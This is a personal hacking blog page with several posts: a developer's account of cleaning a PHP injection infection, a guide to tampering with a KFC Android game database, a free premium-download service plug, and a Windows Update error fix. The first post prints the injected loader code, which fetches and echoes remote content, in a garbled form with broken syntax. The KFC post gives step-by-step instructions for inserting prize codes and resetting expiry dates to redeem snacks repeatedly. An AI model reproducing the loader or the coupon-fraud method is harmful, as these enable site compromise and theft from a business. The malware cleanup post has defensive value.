viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, April 8, 2014

The walkthrough to fix ftpchk3.php virus that hacked my website

11:30 AM Posted by viperfx07 , , , , , , 1 comment


I work as a web developer for a financial company and got a hacking problem related to scripts that are being injected and got an insight today and FINALLY SOLVED IT. When I first found this problem, I didn't bother at all. I just replaced all the infected files with cleaned ones and hope that would solve the problem. But apparently, it came again on the next day 

I got reckon these things first before I've reached to a conclusion of the REAL culprit
1. Disable vulnerable codes to upload files. I thought the hackers were smart but apparently not that smart
2. Outdated framework codes (if applicable)I updated to the latest version but didn't solve the problem.
3. FTP accounts GOT HACKED. I never think of this before until I slowly and thoroughly think about the problem. Try the steps below

I still think I was lucky enough that the hacker didn't upload any PHP shells like c99.php because they could've taken over the whole website. Also, they didn't delete any files from the server.



In my case, the virus changes all your html and javascript files to add a malicious script into your site. This injection allows the attacker to remotely execute PHP code on your website if the php infected code is running on your pages. Its supposedly called Bagle.

These might be the problem 

if (empty($aq)) {
    @ini_set('display_errors', 0);
    if (!function_exists('__url_get_contents')) {
        function __url_get_contents($remote_url, $timeout)
            if (function_exists('curl_exec')) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $remote_url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                $_url_get_contents_data = curl_exec($ch);
            } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                $ctx = @stream_context_create(array('http' =>
                        'timeout' => $timeout,
                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
            } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
                $handle = @fopen($remote_url, "r");
                $_url_get_contents_data = @stream_get_contents($handle);
            } else {
                $_url_get_contents_data = __file_get_url_contents($remote_url);
            return $_url_get_contents_data;
    if (!function_exists('__file_get_url_contents')) {
        function __file_get_url_contents($remote_url)
            if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                $remote_url, $matches)
            ) {
                $protocol = strtolower($matches[1]);
                $host = $matches[2];
                $path = $matches[3];
            } else {
                // Bad remote_url-format
                return FALSE;
            if ($protocol == "http") {
                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
            } else {
                // Bad protocol
                return FALSE;
            if (!$socket) {
                // Error creating socket
                return FALSE;
            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
            $len_written = @fwrite($socket, $request);
            if ($len_written === FALSE || $len_written != strlen($request)) {
                // Error sending request
                return FALSE;
            $response = "";
            while (!@feof($socket) &&
                ($buf = @fread($socket, 4096)) !== FALSE) {
                $response .= $buf;
            if ($buf === FALSE) {
                // Error reading response
                return FALSE;
            $end_of_header = strpos($response, "\r\n\r\n");
            return substr($response, $end_of_header + 4);
    if (empty($__var_to_echo) && empty($remote_domain)) {
        $aq = "";
        $aq = __url_get_contents($aq, 1);
        if (strpos($aq, 'http://') === 0) {
            $__var_to_echo = '';
            echo $__var_to_echo;

After I found this code, I decided to create a scanner which looks like this (myscanner.php) (not using BASH since I don't have SSH to my server) to scan all files in public_html then I used CRONJOB to run it every 6 hours and save the output in a file:

//Enable the source codes to scan all the codes in public_html recursively from
//Worm/Trojan script injection.
//It searches in the file contents and look for __var_to_echo variable

function foundTheHackInPhpFiles($filepath)
 return (strpos(file_get_contents($filepath),"") !== false || strpos(file_get_contents($filepath),"$__var_to_echo") !== false); 

function foundTheHackInJsFiles($filepath)
 return preg_match("/src.*.php/", file_get_contents($filepath)); //if searching 

//myscanner.php is this file
//wsc.js contains the src from a legit php source
$safeFiles = array('myscanner.php', 'wsc.js');

$directory = '/home2/username/public_html';
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory));
echo ''. "\n" . "
while($it->valid()) {

 //for php files
    if (!$it->isDot() && substr($it->getFilename(),-3) == 'php') {
        $foundTheHackInPhp = foundTheHackInPhpFiles($it->key());
        if($foundTheHackInPhp && !in_array($it->getFilename(), $safeFiles)) echo 'File:' . $it->key() . "\n";

 //for javascript files
    if (!$it->isDot() && substr($it->getFilename(),-2) == 'js') {
        $foundTheHackInJs = foundTheHackInJsFiles($it->key());
        if($foundTheHackInJs && !in_array($it->getFilename(), $safeFiles)) echo 'File:' . $it->key() . "\n";

echo '

The next day, I got only the JS files and no malicious PHP files.

Then, I decided to read the access logs again and found out: - - [08/Apr/2014:00:45:05 +1000] "GET /ftpchk3.php

Someone ran a malicious code on my server. 

I searched on Google about ftpchk3.php and found this article

What it does?
It adds scripts to html, javascript files and adds a unique php script code to the beginning of every php file. It looks like 

The code adds scripts to your code (like __var_to_echo variable in the first source code) and executes codes coming via GET requests.

I checked my FTP accounts and logs and found out that the accounts I setup were being used to upload ftpchk3.php and infected/injected JS files. I still do not know how they got the FTP account details.

I removed those accounts because they are not used anymore and I'm 100% sure it SOLVES the problem

Steps to consider

1. Scan all your vulnerable codes

1. Look for codes that are used to upload files. Make sure the codes not only check the MIME types because they can be TAMPERED easily. Also, check Null Byte Parameter exploit.

2. SQL Injection and XSS could be the culprit.

In my case, the codes are not the culprit

2. Update your framework codes (if applicable)

I searched on Google for vulnerabilities in CakePHP 1.2 and realised that I needed to update it to the latest version.

In my case, the CakePHP 1.2 is not the culprit

3. Secure your FTP Accounts 

You might not know that your FTP account have been compromised. Make sure that your password is complex enough from brute force attack.

4. Check your RAW access and FTP access logs

This will help you to track down who accessed your server, what have been accessed and/or uploaded on your server.

Wednesday, March 26, 2014

How to hack KFC Snack! in the Face - Android

I performed this hack using Windows 7/8 and Nexus 4 rooted using Paranoid Android ROM 4.2 beta.


Tools you need:

On Windows

1. 7zip/Winrar/Winzip or other archive/extracting tools
2. JPEXS Free Flash Decompiler
3. SQLite Administrator or other SQLite editor

On Android (must be rooted)

1. Root Explorer (paid) / ES File Explorer (free)
2. (optional) SQLite Editor (paid)

Steps (on Android)

1. Install and play the game with your Internet enabled and get one snack at least
2. After you get it, open Root Explorer / ES File Explorer to get the APK files in /data/app/ and find and copy this to your sdcard (/storage/emulated/0/)

3. Then, copy the APK to your computer
4. The second file you need to copy to your computer is the mysnackData.db located in /data/data/ Store/


Next steps are to find the prize codes and apply it on the database. So, on your PC

1. Install JPEXS Free Flash Decompiler and SQLite Administrator. SQLite doesn't need to be installed.
2. Extract the APK file to a folder using 7zip or Winrar . For the demonstration purpose, I extracted it into folder
3. Go to the folder and open \assets\KFC_Game.swf with JPEXS Free Flash Decompiler
4. Go to scripts/au/kfc/snackgame/util/DealUtil in the decompiler 4. The deals stored in variable dealArray

Now we just need to add the prize codes into the "mysnackData.db" database. 

1. Open sqliteadmin. Choose Database - Open. Then choose mysnackData.db that has been copied on your PC.
2. On the left-hand side bar, navigate to mySnackData. Since I've put all the prizeIDs, you see more records than you have it on your mySnackData.db. 

3. To add the prizes, replicate the existing record to a new one, except the prizeID. To add, click + sign or you can go to any field than press down-arrow key on your keyboard. Make sure the playerPrizeID and playerID are the same as the existing record you have.


1. Once, you have added the prizeIDs, copy the mySnackData.db to /data/data/ Store/. 

2. Enjoy the free snacks

Keep a copy of the modified mySnackData.db if you want to redeem the same prize

Optional but it's useful

Requirement: BusyBox, ScriptManager

This step will save you a lot of time and you can redeem it over and over without a hassle.
I created a shell script to update the table so that the expiry dates are always set to 3 days after you run the script.

The script should run if you follow these steps:
1. Create a folder called kfchack in your sdcard (/storage/emulated/0/)
Note: Your path might be different and might need to try several paths to get the script working. Please read below explanation. 
Recommended lecture: Why did /sdcard/ turn into /sdcard/0/ with 4.2?.
In short: It has to do with the multi-user functionality introduced with Jelly Bean:
  • /storage/emulated/0/: to my knowledge, this refers to the "emulated MMC" ("owner part"). Usually this is the internal one. The "0" stands for the user here, "0" is the first user aka device-owner. If you create additional users, this number will increment for each.
  • /storage/emulated/legacy/ as before, but pointing to the part of the currently working user (for the owner, this would be a symlink to /storage/emulated/0/). So this path should bring every user to his "part".
  • /mnt/sdcard (Android < 4.0)
  • /storage/sdcard0 (Android 4.0+)
  • /storage/sdcard0/: As there's no legacy pendant here (see comments below), the "0" in this case rather identifies the device (card) itself. One could, eventually, connect a card reader with another SDCard via OTG, which then would become /storage/sdcard1 (no proof for that, just a guess -- but I'd say a good one)
Though one might get to the conclusion there should be a /storage/sdcard/legacy as well, there isn't (see comments) -- which completely makes sense with my assumption of the numbers here are not related to the user, but rather to possible multiple cards: "0" would always be the one in the card-slot of the device, so no need for a "legacy symlink" here.
Try /storage/emulated/0, /storage/emulated/legacy/, or /storage/sdcard0 depending on your Android version
2. Copy modified mySnackData.db into the folder
3. Create a file called The content is


sqlite3 /storage/emulated/0/kfchack/mysnackData.db "UPDATE mysnackData SET createdOn = strftime('%Y-%m-%dT%H:%M%f',date('now')), modifiedOn = strftime('%Y-%m-%dT%H:%M%f',date('now')) , expiresOn = strftime(' %Y-%m-%dT%H:%M%f', date('now') , '+3 day')"

cat /storage/emulated/0/kfchack/mysnackData.db > "/data/data/ Store/mysnackData.db"

The script will update the records on your database and overwrite the mySnackData.db in Local Store with the updated database.

4. Install ScriptManager
5. Create a SMShortcuts shortcut on your homescreen.

6. Choose "Add one script schortcut"

7. Choose "". The icon with star means it's saved as Favourite.

8. To get the script stored as Favourite, you need to open Script Manager, navigate it to and use this configuration

KFC Snack! in the Face v2 codes


BOGOF and Others

Monday, May 30, 2011

Premium download Rapidshare, Megaupload, Hotfile and many more. FREE

6:28 PM Posted by viperfx07 , , , No comments
MultiDebrid is an unrestricted downloader that allows you to download files instantly and at the best of your Internet speed. On hosts such as Megaupload, Megavideo, Rapidshare, Fileserve and more. So you can meet all your needs of download by using DebridMax to improve your downloads. MultiDebrid offers a multi-hosting completely free !

MultiDebrid is also supported with Chrome extension and Firefox extension

Friday, December 17, 2010

Fix 0x80240030 Windows Update Error (Proxy Setting)

8:16 PM Posted by viperfx07 , No comments
What causes Error 0x80240030

# Incorrect character exists in the proxy override settings.

# A misconfigured Proxy/Firewall can cause this problem.

# You are trying to access Windows Update using VPN. The website and Automatic Update may not function properly.

# The corporate environment does not have autoproxy implemented.

To try and resolve the error 0x80240030, use the following tips... After each tip test to determine whether the issue is resolved.

Resolution Suggestion One:

# Remove invalid characters from the proxy exception list and then clear the proxy cache.

1. Open Internet Explorer.
2. On the Tools, select Internet Options.
3. Click on the Connections tab.
4. Click on the LAN Settings.
5. Click on the Advanced button.
6. Please delete any entry in the Exceptions section.

Next, clear your proxy cache.

1. Click on Start, and then click Run.
2. Type cmd in the Open box to get a DOS prompt.
3. Type proxycfg -d at the command prompt, and press Enter.
4. Type net stop wuauserv at the command prompt, and press Enter.
5. Type net start wuauserv at the command prompt, and press Enter.
6. Now try the site again.


Resolution Suggestion Two:

# Reconfigure or update your firewall program.

Double-check the Proxy/Firewall settings. Add the following urls to the exception list within your Firewall/Proxy:


For help configuring Proxy/Firewall refer to documentation or contact the manufacturer.


Resolution Suggestion Three:

# VPN and Proxy.

You are trying to access Windows Update using VPN. The website and Automatic Update may not function properly.

Autoproxy is not picking up the wpad.dat proxy configuration file to determine the proxy to be used for the target URL. Thus we are going with no proxy!

1. Try to access Windows Update while not using VPN connection.
2. Use the proxycfg tool to specify a proxy server to use (proxycfg.exe -p ). (contact your network administrator to find out the name and port of this proxy.)


Resolution Suggestion Four:

# Run proxycfg to tell WU about your proxy.

The corporate environment does not have autoproxy implemented.

Automatic Update will always do autoproxy detection and thus if that returns no proxy, it will try to use no proxy. Use the proxycfg tool to specify a proxy server to use (proxycfg.exe -p ). Please contact your network administrator to find out the name and port of this proxy.


Resolution Suggestion Five:

# OnSpeed Software.

A further solution may be to exit OnSpeed (a compression tool to speed up Internet connections) if installed. Disabling the program does not appear to work BUT fully exiting it completely does...

...or try this setting:

Onspeed> settings> features> use browsers Proxy exclusion setting.